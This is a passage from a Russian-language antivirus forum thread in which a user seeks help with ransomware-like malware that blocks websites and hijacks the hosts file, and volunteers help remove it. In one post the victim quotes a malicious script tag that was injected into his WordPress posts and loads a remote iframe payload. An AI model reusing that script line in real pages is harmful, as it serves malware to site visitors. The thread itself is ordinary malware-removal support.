Перейти к содержимому


Фото
- - - - -

Вирус нового поколения!

смс вирус ПК

  • Please log in to reply
161 ответов в этой теме

#41 l.e.e.

l.e.e.

    Guru

  • Posters
  • 4 797 Сообщений:

Отправлено 05 Январь 2013 - 18:26

Удаленный доступ тут

Сиюминутное Ригпа бессущностно и ясно.

drweb.png


#42 maza177

maza177

    Newbie

  • Posters
  • 68 Сообщений:

Отправлено 05 Январь 2013 - 19:02

Как я устал от всего. кто может помоч за деньги.. дам доступ, что угодно.

#43 mrbelyash

mrbelyash

    Беляш

  • Members
  • 25 897 Сообщений:

Отправлено 05 Январь 2013 - 19:09

Как я устал от всего. кто может помоч за деньги.. дам доступ, что угодно.


деньги-пыль...люди-все

Давайте в личку id и пароль, попробую

http://www.teamviewer.com/download/TeamViewerQS_ru.exe
wiki https://drw.sh/endjcv | Утилиты https://drw.sh/dgweku | Лечить удаленно https://drw.sh/wmzdcl | Скрытые процессы https://drw.sh/tmulje | Логи https://drw.sh/ruy | Песочница https://drw.sh/exhbro

#44 mrbelyash

mrbelyash

    Беляш

  • Members
  • 25 897 Сообщений:

Отправлено 05 Январь 2013 - 20:04

меня рвет в пух и прах....просят зарегестрироваться.
------------

Там какая-то гадость восстанавливает в HKCU\RUN копирвание нового hosts

Сообщение было изменено mrbelyash: 05 Январь 2013 - 20:04

wiki https://drw.sh/endjcv | Утилиты https://drw.sh/dgweku | Лечить удаленно https://drw.sh/wmzdcl | Скрытые процессы https://drw.sh/tmulje | Логи https://drw.sh/ruy | Песочница https://drw.sh/exhbro

#45 mrbelyash

mrbelyash

    Беляш

  • Members
  • 25 897 Сообщений:

Отправлено 05 Январь 2013 - 20:05

не могу подключиться
wiki https://drw.sh/endjcv | Утилиты https://drw.sh/dgweku | Лечить удаленно https://drw.sh/wmzdcl | Скрытые процессы https://drw.sh/tmulje | Логи https://drw.sh/ruy | Песочница https://drw.sh/exhbro

#46 mrbelyash

mrbelyash

    Беляш

  • Members
  • 25 897 Сообщений:

Отправлено 05 Январь 2013 - 20:26

я угадал :)

Отправленное изображение
wiki https://drw.sh/endjcv | Утилиты https://drw.sh/dgweku | Лечить удаленно https://drw.sh/wmzdcl | Скрытые процессы https://drw.sh/tmulje | Логи https://drw.sh/ruy | Песочница https://drw.sh/exhbro

#47 3421

3421

    Newbie

  • Posters
  • 65 Сообщений:

Отправлено 05 Январь 2013 - 20:36

Решено?

#48 3421

3421

    Newbie

  • Posters
  • 65 Сообщений:

Отправлено 05 Январь 2013 - 20:43

Лишним не будет знать, чем ещё проверить.

Без паники. Скачиваете это. Устанавливаете. Обновляете базы каждого продукта. Найденные файлы здесь проверить. https://www.virustotal.com/ чтобы остальным известно стало.
HitmanPro 3 - Second Opinion Malware Scanner http://www.surfright.nl/en/hitmanpro/
Emsisoft Emergency Kit 3.0 http://www.emsisoft.ru/ru/software/eek
Malwarebytes Anti-Malware http://www.malwarebytes.org/

#49 mrbelyash

mrbelyash

    Беляш

  • Members
  • 25 897 Сообщений:

Отправлено 05 Январь 2013 - 20:48

Лишним не будет знать, чем ещё проверить.

Без паники. Скачиваете это. Устанавливаете. Обновляете базы каждого продукта. Найденные файлы здесь проверить. https://www.virustotal.com/ чтобы остальным известно стало.
HitmanPro 3 - Second Opinion Malware Scanner http://www.surfright.nl/en/hitmanpro/
Emsisoft Emergency Kit 3.0 http://www.emsisoft.ru/ru/software/eek
Malwarebytes Anti-Malware http://www.malwarebytes.org/


Зачем?
он доктором детектится.
wiki https://drw.sh/endjcv | Утилиты https://drw.sh/dgweku | Лечить удаленно https://drw.sh/wmzdcl | Скрытые процессы https://drw.sh/tmulje | Логи https://drw.sh/ruy | Песочница https://drw.sh/exhbro

#50 3421

3421

    Newbie

  • Posters
  • 65 Сообщений:

Отправлено 05 Январь 2013 - 21:03

Не всё можно найти одной антивирусной программой. Я подготавливал свой ответ, когда вашего ответа еще не видел. На будущее пускай знают, кто читает. Как уже написал. Моё мнение лишним знать об этих программах не будет.

#51 run

run

    Member

  • Banned
  • 228 Сообщений:

Отправлено 05 Январь 2013 - 23:15

Не всё можно найти одной антивирусной программой. Я подготавливал свой ответ, когда вашего ответа еще не видел. На будущее пускай знают, кто читает. Как уже написал. Моё мнение лишним знать об этих программах не будет.

Найти это конечно гуд, а вот личить они могут?, это довольно не тривиальная задача которая очень важна, так как не редко при тупом удалении система получает инвалидность или вообще в коме.

#52 maza177

maza177

    Newbie

  • Posters
  • 68 Сообщений:

Отправлено 06 Январь 2013 - 15:19

Большое спасибо Вам все рабята, что откликнулись на мою проблему и помогли: кто советом, кто действием.
Особенно хочу выразить благодарность такаому человеку какmrbelyash, человек дела! Умный отзывчивый, находчивый, через таймвивер помог излечить мой ПК, удалил файлы, проделал столько комбинаций. Умный и порядочный человек, человек дела, повторюсь! Большое спасибо, что есть такие люди как ты. Удачи тебе во всем!
Так же всем кто откликнулся.
И Сашуле тоже большое спасибо.
mrbelyash - если у вас есть блог или сайт, то я с удовольствием сделаю упоминание и размещу ссылку на своём днивнике.

#53 mrbelyash

mrbelyash

    Беляш

  • Members
  • 25 897 Сообщений:

Отправлено 06 Январь 2013 - 15:24

http://stop-winlock.ru
wiki https://drw.sh/endjcv | Утилиты https://drw.sh/dgweku | Лечить удаленно https://drw.sh/wmzdcl | Скрытые процессы https://drw.sh/tmulje | Логи https://drw.sh/ruy | Песочница https://drw.sh/exhbro

#54 maza177

maza177

    Newbie

  • Posters
  • 68 Сообщений:

Отправлено 07 Январь 2013 - 04:02

Как и обещал сделал упоминание о Вас http://mazablog.ru/?p=1935 у себя на блоге! Ещё раз всем спасибо за помощь!

Сообщение было изменено maza177: 07 Январь 2013 - 04:02


#55 mrbelyash

mrbelyash

    Беляш

  • Members
  • 25 897 Сообщений:

Отправлено 07 Январь 2013 - 04:03

А нужно через Sandboxie ходить :)
http://mrbelyash.blogspot.com/2012/01/sandboxie.html
wiki https://drw.sh/endjcv | Утилиты https://drw.sh/dgweku | Лечить удаленно https://drw.sh/wmzdcl | Скрытые процессы https://drw.sh/tmulje | Логи https://drw.sh/ruy | Песочница https://drw.sh/exhbro

#56 maza177

maza177

    Newbie

  • Posters
  • 68 Сообщений:

Отправлено 12 Февраль 2013 - 03:23

Опять сталкнулся с такой проблемой, пытался сново решить её, опять же.  фиксить нечего так как там нет подозрительного ничего, в ланировщике заданиий тоже нет ничего, доктор вбе качал обновленный, тоже не нашел ничего,  CClener очистил все, и hosts заменил файлы - ничего не помогло.

 

Ps. Пишу статью на блог, это не вирус в каждой статье прописывается iframe код, как удалить не знаю, на примере вордпресса, как такая статья в ней ничего нет, а когда открываеш когда пост пишешь в htm версии в конце поста iframe код прописывается (пишу пост к примеру на вордпрессе (движок) в посту не видно никаких ссылок  ВИЗУАЛЬНО (ружим) когда переключаюсь в HTML версию, то виду в конце поста ссылки iframe)  <script type="text/javascript" src="http://antispamvksocialcheck.info/iframe.php"></script>

 

Ps.s. выходит сайты тоже вирус мои поймали, или же вирус умный, на компе сидит и ждет когда я посты писать буду и начинате в это время прописываться?

 

Прикрепил файл,

Прикрепленные файлы:



#57 maza177

maza177

    Newbie

  • Posters
  • 68 Сообщений:

Отправлено 12 Февраль 2013 - 03:24

Доступа опять нет, не на яндеккс, не на фейсбук, не вконтакте, никуда.



#58 maza177

maza177

    Newbie

  • Posters
  • 68 Сообщений:

Отправлено 12 Февраль 2013 - 03:33

mrbelyash тогда помог мне, предоставлял удалённый доступ, за что ему огромное спасибо.

В этот раз подхватил вирус с одного очень плохого сайта, (адрес не помню только помню было написанно "Жабе 7 лет") после чего маргнуло и опера закрылась, и симпктомы на лицо.

А всего навсего продавал ручку, Пеликан немецкую 1960 годов примерно,  и набор циркулей.

А тут у них вирус



#59 maza177

maza177

    Newbie

  • Posters
  • 68 Сообщений:

Отправлено 12 Февраль 2013 - 04:34

могу писать только в экспролере, вот даже в опере не могу пост напсиать, лезит баннер

Прикрепленные файлы:

  • Прикрепленный файл  fd.jpg   50,15К   1 Скачано раз


#60 SergM

SergM

    Guru

  • Moderators
  • 9 387 Сообщений:

Отправлено 12 Февраль 2013 - 05:07

 Пофиксите 

 

O17 - HKLM\System\CCS\Services\Tcpip\..\{7859809D-D40A-4757-9331-855DB654889B}: NameServer = 10.77.48.49 10.77.48.33
O17 - HKLM\System\CCS\Services\Tcpip\..\{CC1AB230-828C-47A3-BAF8-7CC33F9AFA24}: NameServer = 10.77.48.33 10.77.48.49





Also tagged with one or more of these keywords: смс вирус, ПК

Читают тему: 0

0 пользователей, 0 гостей, 0 скрытых